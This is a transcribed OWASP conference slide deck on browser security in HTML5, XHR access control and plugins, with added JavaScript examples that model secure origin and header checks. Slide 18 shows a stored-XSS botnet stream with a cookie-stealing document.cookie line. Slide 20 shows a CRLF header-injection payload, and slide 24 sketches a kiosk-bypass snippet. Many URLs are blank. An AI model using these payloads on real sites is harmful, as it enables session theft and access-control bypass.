Browser Security



This talk is a generic but comprehensive overview of security mechanisms, controls and potential attacks in modern browsers. The talk also focuses on new technologies, such as HTML5 and related APIs, to highlight new attack scenarios against browsers.


1. OWASP – Browser Security
   Roberto Suggi Liverani, Security Consultant
   3 September 2008
2. Who am I?
   - Roberto Suggi Liverani
   - Security Consultant, CISSP
     - 4+ years in information security, focusing on web application and network security
     - OWASP New Zealand founder/leader
3. Agenda
   - Introduction
     - A look at the present
     - The potential risks
   - Some challenges
     - HTML 5.0
     - WebApps (XHR)
     - Browser plugins
   - OWASP approach to the problem
     - OWASP Intrinsic Group
4. Introduction
   - Present: web security focus is mainly on web apps rather than browsers
   - But: browser bugs affect many more users than web application bugs
5. Introduction
   - Browser statistics from
   - JavaScript statistics
6. Introduction
   - The risks are not just in the numbers...
     - Do you remember the "On the job browser exploitation" talk by Mark Piper?
   - Technologies evolve:
     - HTML5
     - XHR
     - Browser plugins
   - Current browser security progress is mainly focused on:
     - Reflected XSS filtering and CSRF protection
     - Phishing website detection
7. Next Challenges
   - HTML5 (W3C working draft)
   - New features with a security impact:
     - Origin policy
     - Browsing contexts and navigation
     - Custom protocol and content handlers
     - Structured client-side storage
     - Offline web applications
     - Cross-document messaging
     - Server-sent events
     - Web sockets
8. HTML5
   - Relaxing the origin policy:
   - Window object origin-policy exceptions:
     - Location object
     - postMessage()
     - frames attribute
     - XXX4 method
   Diagram: XSS injection; document.domain = ; communication between 2 subdomains through XSS
9. HTML5
   - Browsing contexts and navigations
     - Opener browsing context – 1.COM
     - Auxiliary browsing context – 3.COM
     - Nested browsing context – 2.COM
   Diagram: 1.COM (vulnerable); malicious third party 3.COM; (a) injection in 1.COM of pointing to 3.COM; (b) iframe injection src=2.COM; cross-context scripting between 2.COM and 3.COM
10. HTML5
   - Custom protocol and content handlers
     - registerProtocolHandler() – ftp:, fax:, foo:
     - registerContentHandler() – MIME type, e.g. text/foo
   Diagram (A.COM, B.COM):
     navigator.registerContentHandler('text/foo', 'foo?url=%s', 'foo')
     <a>Download</a>   (served as text/foo; redirection to: )
11. HTML5
   - Hijacking content or protocol handlers
     - navigator.registerProtocolHandler('HTTPS', 'foo?url=%s', 'foo')
   - Register spamming
     - A site tries to register multiple protocol/content handlers
     - Multiple sites try to register the video/mpeg content type
   - Leaking intranet URLs
     - User registers a certain content handler (text/foo)
     - User clicks
     - User is redirected to an external site which handles text/foo
   - Leaking HTTPS
     - User is redirected to a site with an HTTPS URL
   - Leaking credentials in the GET request
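The following is an added example, not code from the talk: a user-agent-style gatekeeper for registerProtocolHandler()/registerContentHandler() that refuses the hijacking case above (claiming https) and shows how the "%s" substitution carries an intranet URL, an HTTPS URL or embedded credentials to the handler site in a GET request. The deny-list of native schemes, the same-origin rule for the handler URL and every origin and URL used are this example's own assumptions, not the browser's or the specification's exact lists.

```javascript
// Added example, not code from the talk: a user-agent-style gatekeeper for
// registerProtocolHandler()/registerContentHandler(). The deny-list, the
// same-origin rule and all origins/URLs below are this example's assumptions.

// Schemes the browser handles natively. Letting a site claim one of these
// (the slide's registerProtocolHandler('HTTPS', ...)) would route every such
// navigation through that site.
const NATIVE_SCHEMES = new Set(['http', 'https', 'file', 'javascript', 'data', 'about']);

// Validate a registration the way a careful user agent would and return the
// record it would store. Throws on the cases a browser must refuse.
function registerHandler(kind, key, template, documentOrigin) {
  if (kind !== 'protocol' && kind !== 'content') throw new TypeError('kind must be protocol or content');
  if (typeof template !== 'string' || !template.includes('%s')) {
    throw new SyntaxError('handler URL template must contain %s');
  }
  // Relative templates (like the slide's 'foo?url=%s') resolve against the registering page.
  const handlerUrl = new URL(template, documentOrigin + '/');
  if (handlerUrl.origin !== documentOrigin) {
    throw new Error('SecurityError: handler URL must be on the registering origin');
  }
  const normalized = key.toLowerCase();
  if (kind === 'protocol' && NATIVE_SCHEMES.has(normalized)) {
    throw new Error('SecurityError: scheme "' + normalized + '" cannot be overridden');
  }
  return { kind, key: normalized, handler: handlerUrl.href };
}

// The navigation a browser performs when a registered handler fires: the
// original URL is percent-encoded into the template. This is where an
// intranet URL, an https:// URL or credentials in a URL leak to the handler
// site in a GET request, as the slide's "Leaking ..." bullets describe.
function handlerNavigation(registration, originalUrl) {
  return registration.handler.replace('%s', encodeURIComponent(originalUrl));
}

// Demonstration on constructed values.
const reg = registerHandler('content', 'text/foo', 'foo?url=%s', 'http://a.example');
console.log('registered:', reg.handler);
console.log('leaks to:', handlerNavigation(reg, 'http://intranet.corp/report.foo'));
for (const [kind, key, tpl, origin] of [
  ['protocol', 'HTTPS', 'foo?url=%s', 'http://a.example'],             // hijack attempt
  ['protocol', 'foo', 'http://b.example/h?u=%s', 'http://a.example'],   // cross-origin handler
  ['content', 'text/foo', 'foo?url=', 'http://a.example'],              // no %s
]) {
  try { registerHandler(kind, key, tpl, origin); } catch (e) { console.log('refused:', e.message); }
}
```

The leak is structural rather than a bug in any one browser: once a handler is registered, every matching URL the user opens is sent to the handler's origin as a query parameter, so the registering site should be treated as a party that will see those URLs.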
12. HTML5
   - Structured client storage
     - sessionStorage (per-origin data scoped to one browsing session, i.e. one top-level window or tab)
     - localStorage (persistent per-origin data, shared by all pages of the origin)
     - Methods: getItem(), setItem()
     - Only protection: origin policy
   - SQL, yes SQL!!! – to store more structured data
     - Methods: openDatabase(), executeSql()
     - Objects: SQLResultSet, SQLResultSetRowList, SQLError
     - More to come on "browser SQL injection"...
13. HTML5
   - Client storage attack example (A. Trivero)
   - Browser SQL injection example (A. Trivero)
   - Cross-directory attack
     - XSS in can read/write data from/to (storage is scoped per origin, not per path)
   - User tracking – ID put in client storage on multiple sites (marketing, botnet, etc.)
   - Cookie resurrection
14. HTML5
   - Offline web applications
     - Extensive Application Cache API
     - Declared with the manifest attribute on <html>
     - HTTP response with the text/cache-manifest MIME type for the manifest
     - Manifest specifies how specific site content should be cached = application cache policy
     - New items can be added to specific cached content with the method add()
     - Different versions of cached content for the same site
     - Application cache status can be queried:
       - UNCACHED, IDLE, CHECKING, DOWNLOADING, UPDATEREADY
15. HTML5
   - Application cache poisoning
     - A.COM's manifest allows caching of a vulnerable HTML page containing DOM XSS
     - DOM XSS manipulates data when viewed in offline mode
   - Attacking the offline browser
     - Offline application cache content with stored XSS that sets navigator.onLine = true
16. HTML5
   - Cross-document messaging
     - "While this (origin policy) is an important security feature, it prevents pages from different domains from communicating even when those pages are not hostile" – 7.4, W3C HTML5 current draft
     - postMessage(message, messagePort, targetOrigin)

       B.COM (receiver):
         window.addEventListener('message', receiver, false);
         function receiver(e) {
           if (e.origin == ' ') {
             if (e.data == 'Hello world') {
               e.source.postMessage('Hello', e.origin);
             } else {
               alert(e.data);
             }
           }
         }

       A.COM (sender):
         var o = document.getElementsByTagName('iframe')[0];
         o.contentWindow.postMessage('Hello world', '');

     NOTE: this condition can be omitted or set to '*'
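The following is an added example, not code from the talk: an in-process model of window.postMessage() that reproduces the two weaknesses the slide's NOTE points at, a receiver that omits (or weakens) the e.origin check and a sender that passes '*' as targetOrigin, next to the hardened forms. FakeWindow is a stand-in for a real browsing context so the code runs outside a browser; every origin and message is constructed.

```javascript
// Added example, not code from the talk: an in-process model of
// window.postMessage(). FakeWindow stands in for a real browsing context;
// all origins and messages are constructed.

class FakeWindow {
  constructor(origin) { this.origin = origin; this.listeners = []; }
  addEventListener(type, fn) { if (type === 'message') this.listeners.push(fn); }
  // Deliver `data` sent by `source` with the given targetOrigin. Returns false
  // when the browser would silently drop the message because this window's
  // origin does not match targetOrigin (e.g. the frame was navigated elsewhere).
  deliver(source, data, targetOrigin) {
    if (targetOrigin !== '*' && targetOrigin !== this.origin) return false;
    const event = { data, origin: source.origin, source };
    for (const fn of this.listeners) fn(event);
    return true;
  }
}

// 1. Receiver with the origin check omitted: any page that can obtain a
//    reference to this window (opener, parent, iframe) can feed it data.
function naiveReceiver(handled) {
  return (e) => handled.push({ from: e.origin, data: e.data });
}

// 2. Receiver with a substring check: looks like a check, but an origin such
//    as 'https://a.example.evil.example' passes it.
function substringReceiver(handled) {
  return (e) => { if (e.origin.indexOf('a.example') !== -1) handled.push({ from: e.origin, data: e.data }); };
}

// 3. Hardened receiver: exact origin comparison, then the payload is still
//    validated before it is used.
function strictReceiver(trustedOrigin, handled) {
  return (e) => {
    if (e.origin !== trustedOrigin) return;
    if (typeof e.data !== 'string' || e.data.length > 1024) return;
    handled.push({ from: e.origin, data: e.data });
  };
}

// Receiver at B.COM (b.example) that wants messages only from A.COM (a.example).
function runReceivers() {
  const target = new FakeWindow('https://b.example');
  const naive = [], substring = [], strict = [];
  target.addEventListener('message', naiveReceiver(naive));
  target.addEventListener('message', substringReceiver(substring));
  target.addEventListener('message', strictReceiver('https://a.example', strict));
  const senders = [
    new FakeWindow('https://a.example'),              // the legitimate partner
    new FakeWindow('https://evil.example'),           // unrelated attacker page
    new FakeWindow('https://a.example.evil.example'), // substring-check bypass
  ];
  for (const s of senders) target.deliver(s, 'Hello world', 'https://b.example');
  return { naive, substring, strict };
}

// Sender side: '*' hands the message to whatever is currently loaded in the
// frame; an explicit targetOrigin makes the browser drop it after a navigation.
function runSenders() {
  const a = new FakeWindow('https://a.example');
  const frame = new FakeWindow('https://evil.example'); // the iframe has been navigated away
  return {
    wildcardDelivered: frame.deliver(a, 'session-token', '*'),
    explicitDelivered: frame.deliver(a, 'session-token', 'https://b.example'),
  };
}

console.log(runReceivers());
console.log(runSenders());
```

Both halves matter: the receiver's exact e.origin comparison stops hostile senders, and the sender's explicit targetOrigin stops data going to a frame that has been navigated to a hostile page between the time the reference was obtained and the time postMessage() runs.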
17. HTML5
   - Server-sent events
     - Dispatching DOM events into a document that expects them
     - RemoteEventTarget used to fetch data sent as an EventStream (text/event-stream) from:
       - Same site
       - Allowed sites (XHR access control)
     - <eventsource src= onmessage="var stream; (' '); showNews(stream[0], stream[1], stream[2]);">
   Diagram: <eventsource> pulls an EventStream of "data:" lines
18. HTML5
   - Next generation web botnet – C&M interface
   Diagram (BOTNET):
     - Stored XSS in botnet websites:
       <eventsource src= onmessage="var stream; (' '); eval(stream[0], stream[1], stream[2]);">
     - Data stream (MIME: text/event-stream):
       data: wait();
       data: wait();
       data: document.write(<img src=''+document.cookie);
     - Botnet operates following XHR access control for data exchange
19. HTML5
   - Web sockets – new WebSocket(url);
   - Botnet scenario applies as well
   Handshake (client at / server at ):
     Client:
       GET ws:// HTTP/1.1
       Upgrade: WebSocket
       Connection: Upgrade
       Host:
       Origin:
       Authorization: Basic d2FsbGU6ZXZl
     Server:
       HTTP/1.1 101 Web Socket Protocol Handshake
       Upgrade: WebSocket
       Connection: Upgrade
       WebSocket-Origin:
       WebSocket-Location: ws://
     Data framing: send/read raw UTF-8 data byte per byte (both directions)
     Close: the TCP/IP connection is closed – no closing handshake (both directions)
20. WebApps (XHR)
   - XHR access control (GET and POST)
   Resource:    Client:
   JavaScript + XHR:
     var client = new XMLHttpRequest();"GET or POST", "");
     client.onreadystatechange = function() { /* do something */ };
     client.send();
   HTTP response:
     Access-Control-Allow-Origin:
     Hello World!
   NOTE: the entire access control system relies on HTTP headers.
   So what happens with an HTTP splitting attack?
   JavaScript + XHR:
     var client = new XMLHttpRequest();"GET or POST", " %0D%0AAccess-Control-Allow-Origin: ");
     client.onreadystatechange = function() { /* do something */ };
     client.send();
21. WebApps (XHR)
   - XHR access control (other HTTP methods)
   Resource:    Client:
   Preflight request (OPTIONS, issued by the browser before the real request), JavaScript + XHR:
     var client = new XMLHttpRequest();"OPTIONS", "");
     client.onreadystatechange = function() { /* do something */ };
     client.send();
   HTTP response:
     Access-Control-Allow-Origin:
     Access-Control-Max-Age: 3628800
   Actual request (DELETE), JavaScript + XHR:
     var client = new XMLHttpRequest();"DELETE", "");
     client.onreadystatechange = function() { /* do something */ };
     client.send();
   NOTE: the entire access control system relies on HTTP headers
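The following is an added example, not code from the talk: a model of both sides of XHR access control for slides 20 and 21. It answers the slide's question about HTTP splitting with the caveat a practitioner needs: the "%0D%0A" in the XHR URL does nothing by itself; it lands only when the server copies that value into a response header without filtering CR/LF. The vulnerable redirect endpoint, the attacker origin and the paths are constructed, and the preflight rule is the "simple request" classification the browser applies.

```javascript
// Added example, not code from the talk: server and browser halves of XHR
// access control. The vulnerable endpoint, origins and paths are constructed.

// Server side, vulnerable: the `next` query value goes straight into the
// Location header, so "%0D%0A" in it ends that header and starts another.
function buildRedirectVulnerable(next) {
  return ['HTTP/1.1 302 Found', 'Location: ' + next, 'Content-Length: 0', '', ''].join('\r\n');
}

// Server side, hardened: reject control characters before they reach a header.
function buildRedirectHardened(next) {
  if (/[\r\n\u0000]/.test(next)) throw new Error('refusing header injection in redirect target');
  return buildRedirectVulnerable(next);
}

// Client side: a tolerant header parser (bare LF accepted, like many real clients).
function parseResponseHeaders(raw) {
  const lines = raw.split(/\r\n\r\n|\n\n/)[0].split(/\r\n|\n/);
  const headers = {};
  for (const l of lines.slice(1)) {
    const i = l.indexOf(':');
    if (i > 0) headers[l.slice(0, i).trim().toLowerCase()] = l.slice(i + 1).trim();
  }
  return { statusLine: lines[0], headers };
}

// Browser rule: script running at `requestOrigin` may read a cross-origin
// response only if the server named that origin (or '*') in the header.
function responseReadable(requestOrigin, headers) {
  const allow = headers['access-control-allow-origin'];
  return allow === '*' || allow === requestOrigin;
}

// Browser rule for slide 21: GET/HEAD/POST with "simple" headers go out
// directly; anything else (DELETE, custom headers, JSON bodies) is preceded
// by an OPTIONS preflight that the browser, not the script, issues.
function needsPreflight(method, requestHeaders) {
  if (!['GET', 'HEAD', 'POST'].includes(method.toUpperCase())) return true;
  const simple = ['accept', 'accept-language', 'content-language', 'content-type'];
  const simpleTypes = ['application/x-www-form-urlencoded', 'multipart/form-data', 'text/plain'];
  return Object.entries(requestHeaders).some(([name, value]) => {
    const n = name.toLowerCase();
    if (!simple.includes(n)) return true;
    return n === 'content-type' && !simpleTypes.includes(value.split(';')[0].trim().toLowerCase());
  });
}

// Scenario: a page at attacker.example sends an XHR to victim.example/go?next=...
// carrying the slide's payload; the server decodes it before use.
function splittingScenario(builder) {
  const attacker = 'http://attacker.example';
  const next = decodeURIComponent('/home%0D%0AAccess-Control-Allow-Origin:%20' + attacker);
  const parsed = parseResponseHeaders(builder(next));
  return {
    injectedHeader: parsed.headers['access-control-allow-origin'],
    readable: responseReadable(attacker, parsed.headers),
  };
}

console.log('vulnerable:', splittingScenario(buildRedirectVulnerable));
try { splittingScenario(buildRedirectHardened); } catch (e) { console.log('hardened:', e.message); }
console.log('DELETE needs preflight:', needsPreflight('DELETE', {}));
```

The same reasoning covers the preflight on slide 21: the OPTIONS response is just another set of headers, so a server that reflects input into any header on that path can be made to answer its own preflight. The fix is the same on both sides, never let CR/LF from a request reach a response header.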
22. XHR Alternative – XDR (XDomainRequest)
   - Cross-domain request developed by Microsoft
   Resource:    Client:
   JavaScript + XDR:
     var xdr = new XDomainRequest();"GET", "");
   HTTP request:
     GET /xdr.txt
     XDomainRequest: 1
     Host:
   HTTP response:
     XDomainRequestAllowed: 1
     Hello!
   NOTE: the entire XDR mechanism relies on HTTP headers
23. Browser Plugins
   - Adobe Flash
     - LSO (Local Shared Objects)
     - Cookie system completely managed by Adobe
       - 100 KB of data allowed by default
       - Third-party LSOs are allowed by default (100 KB)
     - LSO data is stored and accessed "stealthily"
     - Typically stored in:
       - C:\Documents and Settings\[username]\Application Data\Macromedia\Flash Player
       - Files in the .sol format
     - This "feature" has already been exploited:
       - United Virtualities -> PIE (Persistent Identification Element)
       - Creates a unique ID for each browser and then stores it in an LSO
24. Browser Plugins
   - ActionScript bypasses browser security settings
     - Paul Craig's iKAT 0day technique to bypass kiosk software protection (IE's security model)
     - Something like:
       import;
       import;
       import;

       test.addEventListener(MouseEvent.CLICK, downloadFile);
       var fileRef:FileReference = new FileReference();
       function downloadFile(event:MouseEvent):void {
           // Flash's own save dialog is used, so the browser's download restrictions never apply
  URLRequest(""), "file.html");
       }
25. OWASP Intrinsic Group
   - Aid browser vendors and framework vendors in addressing current security issues
   - Focus on:
     - HTML5 Working Group
     - XMLHttpRequest
     - Web Apps Working Group
     - Mozilla Firefox
     - Adobe (AIR/Flash)
     - Microsoft IE7
     - Microsoft .NET
     - Struts
     - Spring
     - Apache Commons
   - Soon: OWASP Top Ten Browser Security
26. Questions?
   - [email_address]
27. References
   - HTML5
   - XHR and XHR Level 2
   - Access Control for XHR
   - XDR
   - LSO
28. References
   - HTML5 – presentation
   - Abusing HTML 5 Structured Client-side Storage
   - Web stats
   - Browser stats